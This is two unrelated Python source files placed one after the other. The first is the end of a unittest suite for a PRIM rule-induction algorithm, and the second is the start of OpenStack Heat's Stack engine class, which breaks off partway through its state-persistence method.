box = PrimBox(prim_obj, prim_obj.box_init, prim_obj.yi)
new_box_lim = pd.DataFrame([(0,1,1),
(2,5,6)],
columns=['a', 'b', 'c'])
indices = np.array([0,1], dtype=np.int)
box.update(new_box_lim, indices)
self.assertEqual(box.peeling_trajectory['mean'][1], 1)
self.assertEqual(box.peeling_trajectory['coverage'][1], 1)
self.assertEqual(box.peeling_trajectory['density'][1], 1)
self.assertEqual(box.peeling_trajectory['res_dim'][1], 1)
self.assertEqual(box.peeling_trajectory['mass'][1], 2/3)
def test_drop_restriction(self):
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,1)],
columns=['a', 'b', 'c'])
y = {'y':np.array([1,1,0])}
results = (x,y)
prim_obj = prim.setup_prim(results, 'y', threshold=0.8)
box = PrimBox(prim_obj, prim_obj.box_init, prim_obj.yi)
new_box_lim = pd.DataFrame([(0,1,1),
(2,2,6)],
columns=['a', 'b', 'c'])
indices = np.array([0,1], dtype=np.int)
box.update(new_box_lim, indices)
box.drop_restriction('b')
correct_box_lims = pd.DataFrame([(0,1,1),
(2,5,6)],
columns=['a', 'b', 'c'])
box_lims = box.box_lims[-1]
names = box_lims.columns
for entry in names:
lim_correct = correct_box_lims[entry]
lim_box = box_lims[entry]
for i in range(len(lim_correct)):
self.assertEqual(lim_correct[i], lim_box[i])
self.assertEqual(box.peeling_trajectory['mean'][2], 1)
self.assertEqual(box.peeling_trajectory['coverage'][2], 1)
self.assertEqual(box.peeling_trajectory['density'][2], 1)
self.assertEqual(box.peeling_trajectory['res_dim'][2], 1)
self.assertEqual(box.peeling_trajectory['mass'][2], 2/3)
def test_calculate_quasi_p(self):
pass
class PrimTestCase(unittest.TestCase):
def test_setup_prim(self):
self.results = utilities.load_flu_data()
self.classify = flu_classify
experiments, outcomes = self.results
# test initialization, including t_coi calculation in case of searching
# for results equal to or higher than the threshold
outcomes['death toll'] = outcomes['deceased population region 1'][:, -1]
results = experiments, outcomes
threshold = 10000
prim_obj = prim.setup_prim(results, classify='death toll',
threshold_type=prim.ABOVE, threshold=threshold)
value = np.ones((experiments.shape[0],))
value = value[outcomes['death toll'] >= threshold].shape[0]
self.assertTrue(prim_obj.t_coi==value)
# test initialization, including t_coi calculation in case of searching
# for results equal to or lower than the threshold
threshold = 1000
prim_obj = prim.setup_prim(results, classify='death toll',
threshold_type=prim.BELOW,
threshold=threshold)
value = np.ones((experiments.shape[0],))
value = value[outcomes['death toll'] <= threshold].shape[0]
self.assertTrue(prim_obj.t_coi==value)
prim.setup_prim(self.results, self.classify, threshold=prim.ABOVE)
def test_boxes(self):
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,1)],
columns=['a', 'b', 'c'])
y = {'y':np.array([0,1,2])}
results = (x,y)
prim_obj = prim.setup_prim(results, 'y', threshold=0.8)
boxes = prim_obj.boxes
self.assertEqual(len(boxes), 1, 'box length not correct')
# real data test case
prim_obj = prim.setup_prim(utilities.load_flu_data(), flu_classify,
threshold=0.8)
prim_obj.find_box()
boxes = prim_obj.boxes
self.assertEqual(len(boxes), 1, 'box length not correct')
def test_prim_init_select(self):
self.results = utilities.load_flu_data()
self.classify = flu_classify
experiments, outcomes = self.results
unc = experiments.columns.values.tolist()
# test initialization, including t_coi calculation in case of searching
# for results equal to or higher than the threshold
outcomes['death toll'] = outcomes['deceased population region 1'][:, -1]
results = experiments, outcomes
threshold = 10000
prim_obj = prim.setup_prim(results, classify='death toll',
threshold_type=prim.ABOVE, threshold=threshold,
incl_unc=unc)
value = np.ones((experiments.shape[0],))
value = value[outcomes['death toll'] >= threshold].shape[0]
self.assertTrue(prim_obj.t_coi==value)
# test initialization, including t_coi calculation in case of searching
# for results equal to or lower than the threshold
threshold = 1000
prim_obj = prim.setup_prim(results, classify='death toll',
threshold_type=prim.BELOW,
threshold=threshold)
value = np.ones((experiments.shape[0],))
value = value[outcomes['death toll'] <= threshold].shape[0]
self.assertTrue(prim_obj.t_coi==value)
prim.setup_prim(self.results, self.classify, threshold=prim.ABOVE)
def test_quantile(self):
data = pd.Series(np.arange(10))
self.assertTrue(prim.get_quantile(data, 0.9)==8.5)
self.assertTrue(prim.get_quantile(data, 0.95)==8.5)
self.assertTrue(prim.get_quantile(data, 0.1)==0.5)
self.assertTrue(prim.get_quantile(data, 0.05)==0.5)
data = pd.Series(1)
self.assertTrue(prim.get_quantile(data, 0.9)==1)
self.assertTrue(prim.get_quantile(data, 0.95)==1)
self.assertTrue(prim.get_quantile(data, 0.1)==1)
self.assertTrue(prim.get_quantile(data, 0.05)==1)
data = pd.Series([1,1,2,3,4,5,6,7,8,9,9])
self.assertTrue(prim.get_quantile(data, 0.9)==8.5)
self.assertTrue(prim.get_quantile(data, 0.95)==8.5)
self.assertTrue(prim.get_quantile(data, 0.1)==1.5)
self.assertTrue(prim.get_quantile(data, 0.05)==1.5)
def test_box_init(self):
# test init box without NANS
x = pd.DataFrame([(0,1,2),
(2,5,6),
(3,2,7)],
columns=['a', 'b', 'c'])
y = np.array([0,1,2])
prim_obj = prim.Prim(x,y, threshold=0.5,
mode=RuleInductionType.REGRESSION)
box_init = prim_obj.box_init
# some test on the box
self.assertTrue(box_init.loc[0, 'a']==0)
self.assertTrue(box_init.loc[1, 'a']==3)
self.assertTrue(box_init.loc[0, 'b']==1)
self.assertTrue(box_init.loc[1, 'b']==5)
self.assertTrue(box_init.loc[0, 'c']==2)
self.assertTrue(box_init.loc[1, 'c']==7)
# heterogenous without NAN
x = pd.DataFrame([[0.1, 0, 'a'],
[0.2, 1, 'b'],
[0.3, 2, 'a'],
[0.4, 3, 'b'],
[0.5, 4, 'a'],
[0.6, 5, 'a'],
[0.7, 6, 'b'],
[0.8, 7, 'a'],
[0.9, 8, 'b'],
[1.0, 9, 'a']],
columns=['a', 'b', 'c'])
y = np.arange(0, x.shape[0])
prim_obj = prim.Prim(x,y, threshold=0.5,
mode=RuleInductionType.REGRESSION)
box_init = prim_obj.box_init
# some test on the box
self.assertTrue(box_init['a'][0]==0.1)
self.assertTrue(box_init['a'][1]==1.0)
self.assertTrue(box_init['b'][0]==0)
self.assertTrue(box_init['b'][1]==9)
self.assertTrue(box_init['c'][0]==set(['a','b']))
self.assertTrue(box_init['c'][1]==set(['a','b']))
def test_prim_exceptions(self):
results = utilities.load_flu_data()
x, outcomes = results
y = outcomes['deceased population region 1']
self.assertRaises(prim.PrimException, prim.Prim,
x, y, threshold=0.8,
mode=RuleInductionType.REGRESSION)
def test_find_box(self):
results = utilities.load_flu_data()
classify = flu_classify
prim_obj = prim.setup_prim(results, classify,
threshold=0.8)
box_1 = prim_obj.find_box()
prim_obj._update_yi_remaining(prim_obj)
after_find = box_1.yi.shape[0] + prim_obj.yi_remaining.shape[0]
self.assertEqual(after_find, prim_obj.y.shape[0])
box_2 = prim_obj.find_box()
prim_obj._update_yi_remaining(prim_obj)
after_find = box_1.yi.shape[0] +\
box_2.yi.shape[0] +\
prim_obj.yi_remaining.shape[0]
self.assertEqual(after_find, prim_obj.y.shape[0])
def test_discrete_peel(self):
x = pd.DataFrame(np.random.randint(0, 10, size=(100,), dtype=np.int),
columns=['a'])
y = np.zeros(100,)
y[x.a > 5] = 1
primalg = prim.Prim(x, y, threshold=0.8)
boxlims = primalg.box_init
box = prim.PrimBox(primalg, boxlims, primalg.yi)
peels = primalg._discrete_peel(box, 'a', 0, primalg.x_int)
self.assertEqual(len(peels), 2)
for peel in peels:
self.assertEqual(len(peel), 2)
indices, tempbox = peel
self.assertTrue(isinstance(indices, np.ndarray))
self.assertTrue(isinstance(tempbox, pd.DataFrame))
# have modified boxlims as starting point
primalg = prim.Prim(x, y, threshold=0.8)
boxlims = primalg.box_init
boxlims.a = [1,8]
box = prim.PrimBox(primalg, boxlims, primalg.yi)
peels = primalg._discrete_peel(box, 'a', 0, primalg.x_int)
self.assertEqual(len(peels), 2)
for peel in peels:
self.assertEqual(len(peel), 2)
indices, tempbox = peel
self.assertTrue(isinstance(indices, np.ndarray))
self.assertTrue(isinstance(tempbox, pd.DataFrame))
# have modified boxlims as starting point
x.a[x.a>5] = 5
primalg = prim.Prim(x, y, threshold=0.8)
boxlims = primalg.box_init
boxlims.a = [5,8]
box = prim.PrimBox(primalg, boxlims, primalg.yi)
peels = primalg._discrete_peel(box, 'a', 0, primalg.x_int)
self.assertEqual(len(peels), 2)
x.a[x.a<5] = 5
primalg = prim.Prim(x, y, threshold=0.8)
boxlims = primalg.box_init
boxlims.a = [5,8]
box = prim.PrimBox(primalg, boxlims, primalg.yi)
peels = primalg._discrete_peel(box, 'a', 0, primalg.x_int)
self.assertEqual(len(peels), 2)
def test_categorical_peel(self):
x = pd.DataFrame(list(zip(np.random.rand(10,),
['a','b','a','b','a','a','b','a','b','a', ])),
columns=['a', 'b'])
y = np.random.randint(0,2, (10,))
y = y.astype(np.int)
y = {'y':y}
results = x, y
classify = 'y'
prim_obj = prim.setup_prim(results, classify, threshold=0.8)
box_lims = pd.DataFrame([(0, set(['a','b'])),
(1, set(['a','b']))],
columns=['a', 'b'] )
box = prim.PrimBox(prim_obj, box_lims, prim_obj.yi)
u = 'b'
x = x.select_dtypes(exclude=np.number).values
j = 0
peels = prim_obj._categorical_peel(box, u, j, x)
self.assertEqual(len(peels), 2)
for peel in peels:
pl = peel[1][u]
self.assertEqual(len(pl[0]), 1)
self.assertEqual(len(pl[1]), 1)
a = ('a',)
b = ('b',)
x = pd.DataFrame(list(zip(np.random.rand(10,),
[a, b, a, b, a,
a, b, a, b, a])),
columns=['a', 'b'])
y = np.random.randint(0,2, (10,))
y = y.astype(np.int)
y = {'y':y}
results = x, y
classify = 'y'
prim_obj = prim.setup_prim(results, classify, threshold=0.8)
box_lims = prim_obj.box_init
box = prim.PrimBox(prim_obj, box_lims, prim_obj.yi)
u = 'b'
x = x.select_dtypes(exclude=np.number).values
j = 0
peels = prim_obj._categorical_peel(box, u, j, x)
self.assertEqual(len(peels), 2)
for peel in peels:
pl = peel[1][u]
self.assertEqual(len(pl[0]), 1)
self.assertEqual(len(pl[1]), 1)
def test_categorical_paste(self):
a = np.random.rand(10,)
b = ['a','b','a','b','a','a','b','a','b','a', ]
x = pd.DataFrame(list(zip(a,b)), columns=['a', 'b'])
x['b'] = x['b'].astype('category')
y = np.random.randint(0,2, (10,))
y = y.astype(np.int)
y = {'y':y}
results = x,y
classify = 'y'
prim_obj = prim.setup_prim(results, classify, threshold=0.8)
box_lims = pd.DataFrame([(0, set(['a',])),
(1, set(['a',]))], columns=x.columns)
yi = np.where(x.loc[:,'b']=='a')
box = prim.PrimBox(prim_obj, box_lims, yi)
u = 'b'
pastes = prim_obj._categorical_paste(box, u, x, ['b'])
self.assertEqual(len(pastes), 1)
for paste in pastes:
indices, box_lims = paste
self.assertEqual(indices.shape[0], 10)
self.assertEqual(box_lims[u][0], set(['a','b']))
if __name__ == '__main__':
# ema_logging.log_to_stderr(ema_logging.INFO)
unittest.main()
# suite = unittest.TestSuite()
# suite.addTest(PrimTestCase("test_write_boxes_to_stdout"))
# unittest.TextTestRunner().run(suite)
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import copy
import datetime
import functools
import itertools
import re
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import timeutils as oslo_timeutils
from oslo_utils import uuidutils
from osprofiler import profiler
import six
from heat.common import context as common_context
from heat.common import environment_format as env_fmt
from heat.common import exception
from heat.common.i18n import _
from heat.common.i18n import _LE
from heat.common.i18n import _LI
from heat.common.i18n import _LW
from heat.common import identifier
from heat.common import lifecycle_plugin_utils
from heat.common import timeutils
from heat.engine import dependencies
from heat.engine import environment
from heat.engine import event
from heat.engine import function
from heat.engine.notification import stack as notification
from heat.engine import parameter_groups as param_groups
from heat.engine import resource
from heat.engine import resources
from heat.engine import scheduler
from heat.engine import sync_point
from heat.engine import template as tmpl
from heat.engine import update
from heat.objects import raw_template as raw_template_object
from heat.objects import resource as resource_objects
from heat.objects import snapshot as snapshot_object
from heat.objects import stack as stack_object
from heat.objects import stack_tag as stack_tag_object
from heat.objects import user_creds as ucreds_object
from heat.rpc import api as rpc_api
from heat.rpc import worker_client as rpc_worker_client
cfg.CONF.import_opt('error_wait_time', 'heat.common.config')
LOG = logging.getLogger(__name__)
class ForcedCancel(BaseException):
"""Exception raised to cancel task execution."""
def __init__(self, with_rollback=True):
self.with_rollback = with_rollback
def __str__(self):
return "Operation cancelled"
def reset_state_on_error(func):
@six.wraps(func)
def handle_exceptions(stack, *args, **kwargs):
errmsg = None
try:
return func(stack, *args, **kwargs)
except BaseException as exc:
with excutils.save_and_reraise_exception():
errmsg = six.text_type(exc)
LOG.error(_LE('Unexpected exception in %(func)s: %(msg)s'),
{'func': func.__name__, 'msg': errmsg})
finally:
if stack.status == stack.IN_PROGRESS:
msg = _("Unexpected returning while IN_PROGRESS.")
stack.state_set(stack.action, stack.FAILED,
errmsg if errmsg is not None else msg)
assert errmsg is not None, "Returned while IN_PROGRESS."
return handle_exceptions
@six.python_2_unicode_compatible
class Stack(collections.Mapping):
ACTIONS = (
CREATE, DELETE, UPDATE, ROLLBACK, SUSPEND, RESUME, ADOPT,
SNAPSHOT, CHECK, RESTORE
) = (
'CREATE', 'DELETE', 'UPDATE', 'ROLLBACK', 'SUSPEND', 'RESUME', 'ADOPT',
'SNAPSHOT', 'CHECK', 'RESTORE'
)
STATUSES = (IN_PROGRESS, FAILED, COMPLETE
) = ('IN_PROGRESS', 'FAILED', 'COMPLETE')
_zones = None
def __init__(self, context, stack_name, tmpl,
stack_id=None, action=None, status=None,
status_reason='', timeout_mins=None, resolve_data=True,
disable_rollback=True, parent_resource=None, owner_id=None,
adopt_stack_data=None, stack_user_project_id=None,
created_time=None, updated_time=None,
user_creds_id=None, tenant_id=None,
use_stored_context=False, username=None,
nested_depth=0, strict_validate=True, convergence=False,
current_traversal=None, tags=None, prev_raw_template_id=None,
current_deps=None, cache_data=None, resource_validate=True):
"""Initialise the Stack.
Initialise from a context, name, Template object and (optionally)
Environment object. The database ID may also be initialised, if the
stack is already in the database.
Creating a stack with cache_data creates a lightweight stack which
will not load any resources from the database and resolve the
functions from the cache_data specified.
"""
def _validate_stack_name(name):
if not re.match("[a-zA-Z][a-zA-Z0-9_.-]*$", name):
message = _('Invalid stack name %s must contain '
'only alphanumeric or \"_-.\" characters, '
'must start with alpha') % name
raise exception.StackValidationFailed(message=message)
if owner_id is None:
_validate_stack_name(stack_name)
self.id = stack_id
self.owner_id = owner_id
self.context = context
self.t = tmpl
self.name = stack_name
self.action = (self.ADOPT if adopt_stack_data else
self.CREATE if action is None else action)
self.status = self.IN_PROGRESS if status is None else status
self.status_reason = status_reason
self.timeout_mins = timeout_mins
self.disable_rollback = disable_rollback
self.parent_resource_name = parent_resource
self._parent_stack = None
self._resources = None
self._dependencies = None
self._access_allowed_handlers = {}
self._db_resources = None
self.adopt_stack_data = adopt_stack_data
self.stack_user_project_id = stack_user_project_id
self.created_time = created_time
self.updated_time = updated_time
self.user_creds_id = user_creds_id
self.nested_depth = nested_depth
self.convergence = convergence
self.current_traversal = current_traversal
self.tags = tags
self.prev_raw_template_id = prev_raw_template_id
self.current_deps = current_deps
self.cache_data = cache_data
self._worker_client = None
self._convg_deps = None
# strict_validate can be used to disable value validation
# in the resource properties schema, this is useful when
# performing validation when properties reference attributes
# for not-yet-created resources (which return None)
self.strict_validate = strict_validate
# resource_validate can be used to disable resource plugin subclass
# validate methods, which is useful when you want to validate
# template integrity but some parameters may not be provided
# at all, thus we can't yet reference property values such as is
# commonly done in plugin validate() methods
self.resource_validate = resource_validate
if use_stored_context:
self.context = self.stored_context()
self.clients = self.context.clients
# This will use the provided tenant ID when loading the stack
# from the DB or get it from the context for new stacks.
self.tenant_id = tenant_id or self.context.tenant_id
self.username = username or self.context.username
resources.initialise()
self.parameters = self.t.parameters(
self.identifier(),
user_params=self.env.params,
param_defaults=self.env.param_defaults)
self._set_param_stackid()
if resolve_data:
self.outputs = self.resolve_static_data(self.t[self.t.OUTPUTS])
else:
self.outputs = {}
@property
def worker_client(self):
"""Return a client for making engine RPC calls."""
if not self._worker_client:
self._worker_client = rpc_worker_client.WorkerClient()
return self._worker_client
@property
def env(self):
"""This is a helper to allow resources to access stack.env."""
return self.t.env
@property
def parent_resource(self):
"""Dynamically load up the parent_resource.
Note: this should only be used by "Fn::ResourceFacade"
"""
if self._parent_stack is None:
# we need both parent name and owner id.
if self.parent_resource_name is None or self.owner_id is None:
return None
try:
owner = self.load(self.context, stack_id=self.owner_id)
except exception.NotFound:
return None
self._parent_stack = owner
return self._parent_stack[self.parent_resource_name]
def stored_context(self):
if self.user_creds_id:
creds_obj = ucreds_object.UserCreds.get_by_id(self.user_creds_id)
# Maintain request_id from self.context so we retain traceability
# in situations where servicing a request requires switching from
# the request context to the stored context
creds = creds_obj.obj_to_primitive()["versioned_object.data"]
creds['request_id'] = self.context.request_id
# We don't store roles in the user_creds table, so disable the
# policy check for admin by setting is_admin=False.
creds['is_admin'] = False
return common_context.RequestContext.from_dict(creds)
else:
msg = _("Attempt to use stored_context with no user_creds")
raise exception.Error(msg)
@property
def resources(self):
if self._resources is None:
self._resources = dict((name, resource.Resource(name, data, self))
for (name, data) in
self.t.resource_definitions(self).items())
# There is no need to continue storing the db resources
# after resource creation
self._db_resources = None
return self._resources
def iter_resources(self, nested_depth=0):
"""Iterates over all the resources in a stack.
Iterating includes nested stacks up to `nested_depth` levels below.
"""
for res in six.itervalues(self):
yield res
if not res.has_nested() or nested_depth == 0:
continue
nested_stack = res.nested()
for nested_res in nested_stack.iter_resources(nested_depth - 1):
yield nested_res
def _db_resources_get(self, key_id=False):
try:
return resource_objects.Resource.get_all_by_stack(
self.context, self.id, key_id)
except exception.NotFound:
return None
def db_resource_get(self, name):
if not self.id:
return None
if self._db_resources is None:
self._db_resources = self._db_resources_get()
return self._db_resources.get(name) if self._db_resources else None
@property
def dependencies(self):
if self._dependencies is None:
self._dependencies = self._get_dependencies(
six.itervalues(self.resources))
return self._dependencies
def reset_dependencies(self):
self._dependencies = None
def root_stack_id(self):
if not self.owner_id:
return self.id
return stack_object.Stack.get_root_id(self.context, self.owner_id)
def object_path_in_stack(self):
"""Return stack resources and stacks in path from the root stack.
If this is not nested return (None, self), else return stack resources
and stacks in path from the root stack and including this stack.
:returns: a list of (stack_resource, stack) tuples.
"""
if self.parent_resource and self.parent_resource.stack:
path = self.parent_resource.stack.object_path_in_stack()
path.extend([(self.parent_resource, self)])
return path
return [(None, self)]
def path_in_stack(self):
"""Return tuples of names in path from the root stack.
If this is not nested return (None, self.name), else return tuples of
names (stack_resource.name, stack.name) in path from the root stack and
including this stack.
:returns: a list of (string, string) tuples.
"""
opis = self.object_path_in_stack()
return [(stckres.name if stckres else None,
stck.name if stck else None) for stckres, stck in opis]
def total_resources(self, stack_id=None):
"""Return the total number of resources in a stack.
Includes nested stacks below.
"""
if not stack_id:
stack_id = self.id
return stack_object.Stack.count_total_resources(self.context, stack_id)
def _set_param_stackid(self):
"""Update self.parameters with the current ARN.
The ARN is then provided via the Parameters class as the StackId pseudo
parameter.
"""
if not self.parameters.set_stack_id(self.identifier()):
LOG.warn(_LW("Unable to set parameters StackId identifier"))
@staticmethod
def get_dep_attrs(resources, outputs, resource_name):
"""Return the attributes of the specified resource that are referenced.
Return an iterator over any attributes of the specified resource that
are referenced.
"""
attr_lists = itertools.chain((res.dep_attrs(resource_name)
for res in resources),
(function.dep_attrs(out.get('Value', ''),
resource_name)
for out in six.itervalues(outputs)))
return set(itertools.chain.from_iterable(attr_lists))
@staticmethod
def _get_dependencies(resources):
"""Return the dependency graph for a list of resources."""
deps = dependencies.Dependencies()
for res in resources:
res.add_dependencies(deps)
return deps
@classmethod
def load(cls, context, stack_id=None, stack=None, show_deleted=True,
use_stored_context=False, force_reload=False, cache_data=None,
resolve_data=True):
"""Retrieve a Stack from the database."""
if stack is None:
stack = stack_object.Stack.get_by_id(
context,
stack_id,
show_deleted=show_deleted,
eager_load=True)
if stack is None:
message = _('No stack exists with id "%s"') % str(stack_id)
raise exception.NotFound(message)
if force_reload:
stack.refresh()
return cls._from_db(context, stack,
use_stored_context=use_stored_context,
cache_data=cache_data, resolve_data=resolve_data)
@classmethod
def load_all(cls, context, limit=None, marker=None, sort_keys=None,
sort_dir=None, filters=None, tenant_safe=True,
show_deleted=False, resolve_data=True,
show_nested=False, show_hidden=False, tags=None,
tags_any=None, not_tags=None, not_tags_any=None):
stacks = stack_object.Stack.get_all(
context,
limit,
sort_keys,
marker,
sort_dir,
filters,
tenant_safe,
show_deleted,
show_nested,
show_hidden,
tags,
tags_any,
not_tags,
not_tags_any) or []
for stack in stacks:
try:
yield cls._from_db(context, stack, resolve_data=resolve_data)
except exception.NotFound:
# We're in a different transaction than the get_all, so a stack
# returned above can be deleted by the time we try to load it.
pass
@classmethod
def _from_db(cls, context, stack, resolve_data=True,
use_stored_context=False, cache_data=None):
template = tmpl.Template.load(
context, stack.raw_template_id, stack.raw_template)
tags = None
if stack.tags:
tags = [t.tag for t in stack.tags]
return cls(context, stack.name, template,
stack_id=stack.id,
action=stack.action, status=stack.status,
status_reason=stack.status_reason,
timeout_mins=stack.timeout,
resolve_data=resolve_data,
disable_rollback=stack.disable_rollback,
parent_resource=stack.parent_resource_name,
owner_id=stack.owner_id,
stack_user_project_id=stack.stack_user_project_id,
created_time=stack.created_at,
updated_time=stack.updated_at,
user_creds_id=stack.user_creds_id, tenant_id=stack.tenant,
use_stored_context=use_stored_context,
username=stack.username, convergence=stack.convergence,
current_traversal=stack.current_traversal, tags=tags,
prev_raw_template_id=stack.prev_raw_template_id,
current_deps=stack.current_deps, cache_data=cache_data)
def get_kwargs_for_cloning(self, keep_status=False, only_db=False):
"""Get common kwargs for calling Stack() for cloning.
The point of this method is to reduce the number of places that we
need to update when a kwarg to Stack.__init__() is modified. It
is otherwise easy to forget an option and cause some unexpected
error if this option is lost.
Note:
- This doesn't return the args(name, template) but only the kwargs.
- We often want to start 'fresh' so don't want to maintain the old
status, action and status_reason.
- We sometimes only want the DB attributes.
"""
stack = {
'owner_id': self.owner_id,
'username': self.username,
'disable_rollback': self.disable_rollback,
'stack_user_project_id': self.stack_user_project_id,
'user_creds_id': self.user_creds_id,
'nested_depth': self.nested_depth,
'convergence': self.convergence,
'current_traversal': self.current_traversal,
'prev_raw_template_id': self.prev_raw_template_id,
'current_deps': self.current_deps
}
if keep_status:
stack.update({
'action': self.action,
'status': self.status,
'status_reason': self.status_reason})
if only_db:
stack['parent_resource_name'] = self.parent_resource_name
stack['tenant'] = self.tenant_id
stack['timeout'] = self.timeout_mins
else:
stack['parent_resource'] = self.parent_resource_name
stack['tenant_id'] = self.tenant_id
stack['timeout_mins'] = self.timeout_mins
stack['strict_validate'] = self.strict_validate
return stack
@profiler.trace('Stack.store', hide_args=False)
def store(self, backup=False, exp_trvsl=None):
"""Store the stack in the database and return its ID.
If self.id is set, we update the existing stack.
"""
s = self.get_kwargs_for_cloning(keep_status=True, only_db=True)
s['name'] = self._backup_name() if backup else self.name
s['backup'] = backup
s['updated_at'] = self.updated_time
if self.t.id is None:
stack_object.Stack.encrypt_hidden_parameters(self.t)
s['raw_template_id'] = self.t.store(self.context)
else:
s['raw_template_id'] = self.t.id
if self.id:
if exp_trvsl is None:
exp_trvsl = self.current_traversal
if self.convergence:
# do things differently for convergence
updated = stack_object.Stack.select_and_update(
self.context, self.id, s, exp_trvsl=exp_trvsl)
if not updated:
return None
else:
stack_object.Stack.update_by_id(self.context, self.id, s)
else:
if not self.user_creds_id:
# Create a context containing a trust_id and trustor_user_id
# if trusts are enabled
if cfg.CONF.deferred_auth_method == 'trusts':
keystone = self.clients.client('keystone')
trust_ctx = keystone.create_trust_context()
new_creds = ucreds_object.UserCreds.create(trust_ctx)
else:
new_creds = ucreds_object.UserCreds.create(self.context)
s['user_creds_id'] = new_creds.id
self.user_creds_id = new_creds.id
if self.convergence:
# create a traversal ID
self.current_traversal = uuidutils.generate_uuid()
s['current_traversal'] = self.current_traversal
new_s = stack_object.Stack.create(self.context, s)
self.id = new_s.id
self.created_time = new_s.created_at
if self.tags:
stack_tag_object.StackTagList.set(self.context, self.id, self.tags)
self._set_param_stackid()
return self.id
def _backup_name(self):
return '%s*' % self.name
def identifier(self):
"""Return an identifier for this stack."""
return identifier.HeatIdentifier(self.tenant_id, self.name, self.id)
def __iter__(self):
"""Return an iterator over the resource names."""
return iter(self.resources)
def __len__(self):
"""Return the number of resources."""
return len(self.resources)
def __getitem__(self, key):
"""Get the resource with the specified name."""
return self.resources[key]
def add_resource(self, resource):
"""Insert the given resource into the stack."""
template = resource.stack.t
resource.stack = self
definition = resource.t.reparse(self, template)
resource.t = definition
resource.reparse()
self.resources[resource.name] = resource
self.t.add_resource(definition)
if self.t.id is not None:
self.t.store(self.context)
if resource.action == resource.INIT:
resource._store()
def remove_resource(self, resource_name):
"""Remove the resource with the specified name."""
del self.resources[resource_name]
self.t.remove_resource(resource_name)
if self.t.id is not None:
self.t.store(self.context)
def __contains__(self, key):
"""Determine whether the stack contains the specified resource."""
if self._resources is not None:
return key in self.resources
else:
return key in self.t[self.t.RESOURCES]
def __eq__(self, other):
"""Compare two Stacks for equality.
Stacks are considered equal only if they are identical.
"""
return self is other
def __str__(self):
"""Return a human-readable string representation of the stack."""
text = 'Stack "%s" [%s]' % (self.name, self.id)
return six.text_type(text)
def resource_by_refid(self, refid):
"""Return the resource in this stack with the specified refid.
:returns: resource in this stack with the specified refid, or None if
not found.
"""
for r in six.itervalues(self):
if r.state in (
(r.INIT, r.COMPLETE),
(r.CREATE, r.IN_PROGRESS),
(r.CREATE, r.COMPLETE),
(r.RESUME, r.IN_PROGRESS),
(r.RESUME, r.COMPLETE),
(r.UPDATE, r.IN_PROGRESS),
(r.UPDATE, r.COMPLETE)) and r.FnGetRefId() == refid:
return r
def register_access_allowed_handler(self, credential_id, handler):
"""Register an authorization handler function.
Register a function which determines whether the credentials with a
given ID can have access to a named resource.
"""
assert callable(handler), 'Handler is not callable'
self._access_allowed_handlers[credential_id] = handler
def access_allowed(self, credential_id, resource_name):
"""Is credential_id authorised to access resource by resource_name."""
if not self.resources:
# this also triggers lazy-loading of resources
# so is required for register_access_allowed_handler
# to be called
return False
handler = self._access_allowed_handlers.get(credential_id)
return handler and handler(resource_name)
@profiler.trace('Stack.validate', hide_args=False)
def validate(self):
"""Validates the stack."""
# TODO(sdake) Should return line number of invalid reference
# validate overall template (top-level structure)
self.t.validate()
# Validate parameters
self.parameters.validate(context=self.context,
validate_value=self.strict_validate)
# Validate Parameter Groups
parameter_groups = param_groups.ParameterGroups(self.t)
parameter_groups.validate()
# Validate types of sections in ResourceDefinitions
self.t.validate_resource_definitions(self)
# Check duplicate names between parameters and resources
dup_names = (set(six.iterkeys(self.parameters)) &
set(six.iterkeys(self)))
if dup_names:
LOG.debug("Duplicate names %s" % dup_names)
raise exception.StackValidationFailed(
message=_("Duplicate names %s") % dup_names)
for res in self.dependencies:
try:
if self.resource_validate:
result = res.validate()
else:
result = res.validate_template()
except exception.HeatException as ex:
LOG.debug('%s', ex)
raise ex
except AssertionError:
raise
except Exception as ex:
LOG.exception(_LE("Exception: %s"), ex)
raise exception.StackValidationFailed(
message=encodeutils.safe_decode(six.text_type(ex)))
if result:
raise exception.StackValidationFailed(message=result)
for key, val in self.outputs.items():
if not isinstance(val, collections.Mapping):
message = _('Outputs must contain Output. '
'Found a [%s] instead') % type(val)
raise exception.StackValidationFailed(
error='Output validation error',
path=[self.t.OUTPUTS],
message=message)
try:
if not val or 'Value' not in val:
message = _('Each Output must contain '
'a Value key.')
raise exception.StackValidationFailed(
error='Output validation error',
path=[self.t.OUTPUTS, key],
message=message)
function.validate(val.get('Value'))
except exception.StackValidationFailed as ex:
raise
except AssertionError:
raise
except Exception as ex:
raise exception.StackValidationFailed(
error='Output validation error',
path=[self.t.OUTPUTS, key,
self.t.get_section_name('Value')],
message=six.text_type(ex))
def requires_deferred_auth(self):
"""Determine whether to perform API requests with deferred auth.
Returns whether this stack may need to perform API requests
during its lifecycle using the configured deferred authentication
method.
"""
return any(res.requires_deferred_auth for res in six.itervalues(self))
def _add_event(self, action, status, reason):
"""Add a state change event to the database."""
ev = event.Event(self.context, self, action, status, reason,
self.id, {},
self.name, 'OS::Heat::Stack')
ev.store()
@profiler.trace('Stack.state_set', hide_args=False)
def state_set(self, action, status, reason):
"""Update the stack state."""
if action not in self.ACTIONS:
raise ValueError(_("Invalid action %s") % action)
if status not in self.STATUSES:
raise ValueError(_("Invalid status %s") % status)
self.action = action
self.status = status
self.status_reason = reason
if self.convergence and action in (self.UPDATE, self.DELETE,
self.CREATE, self.ADOPT):
# if convergence and stack operation is create/update/delete,
# stack lock is not used, hence persist state
updated = self._persist_state()
if not updated:
# Possibly failed concurrent update
LOG.warn(_LW("Failed to set state of stack %(name)s with"
" traversal ID %(trvsl_id)s, to"
" %(action)s_%(status)s"),
{'name': self.name,
'trvsl_id': self.current_traversal,
'action': action, 'status': status})
return updated
# Persist state to db only if status == IN_PROGRESS
# or action == UPDATE/DELETE/ROLLBACK. Else, it would
# be done before releasing the stack lock.
if status == self.IN_PROGRESS or action in (
self.UPDATE, self.DELETE, self.ROLLBACK):
self._persist_state()
def _persist_state(self):
"""Persist stack state to database"""
if self.id is None:
return
